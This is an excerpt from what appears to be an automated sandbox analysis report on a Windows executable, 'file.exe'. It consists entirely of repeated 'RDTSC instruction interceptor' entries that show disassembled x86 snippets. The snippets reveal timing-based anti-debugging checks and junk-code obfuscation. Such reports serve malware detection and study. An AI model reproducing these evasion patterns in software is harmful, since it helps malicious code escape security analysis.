              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFEB0B second address: CFEB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jno 00007F15FCC2EA66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF534 second address: CFF550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB68h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF550 second address: CFF55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFF55A second address: CFF560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD39D4 second address: CD39DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD39DF second address: CD3A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F15FCD6BB60h 0x0000000d jmp 00007F15FCD6BB5Ah 0x00000012 jl 00007F15FCD6BB5Ch 0x00000018 je 00007F15FCD6BB56h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3A06 second address: CD3A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3A10 second address: CD3A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0036F second address: D0037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F15FCC2EA6Ah 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0037D second address: D00387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F15FCD6BB56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D007FE second address: D0081B instructions: 0x00000000 rdtsc 0x00000002 js 00007F15FCC2EA68h 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F15FCC2EA77h 0x00000010 jmp 00007F15FCC2EA6Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03C1F second address: D03C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03C26 second address: D03C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D075BD second address: D075C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D075C2 second address: D075C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D075C9 second address: D075D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6220 second address: CC625B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCC2EA72h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F15FCC2EA6Dh 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a jmp 00007F15FCC2EA6Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D3C9 second address: D0D3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D3CF second address: D0D3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007F15FCC2EA68h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F15FCC2EA72h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D3F2 second address: D0D414 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Dh 0x00000007 jnp 00007F15FCD6BB56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jl 00007F15FCD6BB6Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D414 second address: D0D41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D6C5 second address: D0D6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F15FCD6BB5Ch 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0D6D8 second address: D0D71C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F15FCC2EA73h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F15FCC2EA77h 0x00000012 ja 00007F15FCC2EA72h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F782 second address: D0F7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push edx 0x0000000a jl 00007F15FCD6BB56h 0x00000010 pop edx 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jg 00007F15FCD6BB64h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F7A2 second address: D0F7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F8DE second address: D0F8EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F8EC second address: D0F8F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FABA second address: D0FAE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15FCD6BB64h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FAE3 second address: D0FAF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F15FCC2EA6Ch 0x00000010 jnp 00007F15FCC2EA66h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FD94 second address: D0FD98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FE97 second address: D0FEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jl 00007F15FCC2EA86h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10330 second address: D10344 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jnl 00007F15FCD6BB56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10344 second address: D10349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D103D3 second address: D10408 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F15FCD6BB5Eh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jne 00007F15FCD6BB62h 0x00000012 jg 00007F15FCD6BB57h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10408 second address: D1040C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1040C second address: D10412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1051D second address: D10521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10612 second address: D10616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D108FE second address: D10930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F15FCC2EA6Ah 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F15FCC2EA78h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10930 second address: D10934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D109A7 second address: D109B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D109B0 second address: D109B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13678 second address: D13691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13691 second address: D13697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D140F5 second address: D140F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13E5D second address: D13E67 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F15FCD6BB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14ADE second address: D14AE8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15FCC2EA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D14AE8 second address: D14B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c cld 0x0000000d push 00000000h 0x0000000f jmp 00007F15FCD6BB5Bh 0x00000014 push 00000000h 0x00000016 xor esi, 59A99DD0h 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1607F second address: D16083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1533F second address: D1534A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F15FCD6BB56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19ACC second address: D19AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A02D second address: D1A03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F15FCD6BB56h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A03C second address: D1A0A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b add dword ptr [ebp+122D20F2h], ecx 0x00000011 jmp 00007F15FCC2EA6Bh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F15FCC2EA68h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F15FCC2EA68h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov ebx, esi 0x00000050 xchg eax, esi 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B080 second address: D1B153 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F15FCD6BB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F15FCD6BB5Eh 0x0000000f popad 0x00000010 push eax 0x00000011 jbe 00007F15FCD6BB69h 0x00000017 jmp 00007F15FCD6BB63h 0x0000001c nop 0x0000001d jmp 00007F15FCD6BB67h 0x00000022 jmp 00007F15FCD6BB5Ah 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F15FCD6BB58h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007F15FCD6BB58h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000018h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f pushad 0x00000060 mov si, 58E5h 0x00000064 mov esi, dword ptr [ebp+1247D275h] 0x0000006a popad 0x0000006b xchg eax, esi 0x0000006c jmp 00007F15FCD6BB65h 0x00000071 push eax 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F15FCD6BB5Fh 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B153 second address: D1B157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B157 second address: D1B174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F15FCD6BB64h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F088 second address: D1F0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 nop 0x00000007 add dword ptr [ebp+1245232Ah], ecx 0x0000000d push 00000000h 0x0000000f jg 00007F15FCC2EA6Ch 0x00000015 or dword ptr [ebp+122D2E7Dh], eax 0x0000001b push 00000000h 0x0000001d mov ebx, dword ptr [ebp+122D2A62h] 0x00000023 push eax 0x00000024 push ebx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24193 second address: D241A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D241A0 second address: D241B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F15FCC2EA66h 0x0000000a jl 00007F15FCC2EA66h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D241B1 second address: D241BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F15FCD6BB56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D241BB second address: D241BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7043 second address: CD7047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C269 second address: D1C27F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D33C second address: D1D346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F15FCD6BB56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7047 second address: CD7053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F15FCC2EA66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C27F second address: D1C318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F15FCD6BB56h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jc 00007F15FCD6BB56h 0x00000017 pop ecx 0x00000018 jng 00007F15FCD6BB5Ch 0x0000001e jbe 00007F15FCD6BB56h 0x00000024 popad 0x00000025 nop 0x00000026 mov ebx, dword ptr [ebp+122D2BF2h] 0x0000002c call 00007F15FCD6BB67h 0x00000031 sub ebx, 4002BC97h 0x00000037 pop edi 0x00000038 push dword ptr fs:[00000000h] 0x0000003f or dword ptr [ebp+122DBA58h], edi 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c movzx edi, di 0x0000004f mov eax, dword ptr [ebp+122D05BDh] 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007F15FCD6BB58h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 0000001Ah 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f mov ebx, dword ptr [ebp+122D2ACEh] 0x00000075 push FFFFFFFFh 0x00000077 mov bl, C3h 0x00000079 nop 0x0000007a push eax 0x0000007b push edx 0x0000007c push esi 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D201CA second address: D201E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA73h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D21196 second address: D2119A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C318 second address: D1C31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D201E1 second address: D201E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2119A second address: D211A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2488C second address: D24892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C31D second address: D1C336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F15FCC2EA74h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D201E5 second address: D2020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F15FCD6BB6Ah 0x00000011 jmp 00007F15FCD6BB64h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D211A0 second address: D211AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D211AD second address: D211B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D257EC second address: D257F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D257F0 second address: D2581A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F15FCD6BB58h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007F15FCD6BB66h 0x00000016 pop ebx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2581A second address: D2582C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA6Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2582C second address: D2588B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F15FCD6BB58h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 or edi, dword ptr [ebp+122D2899h] 0x00000029 push 00000000h 0x0000002b clc 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F15FCD6BB58h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jo 00007F15FCD6BB58h 0x00000051 push esi 0x00000052 pop esi 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2588B second address: D258A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F15FCC2EA6Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D269DF second address: D269E9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F15FCD6BB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D269E9 second address: D269EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28B8F second address: D28B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28B93 second address: D28B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
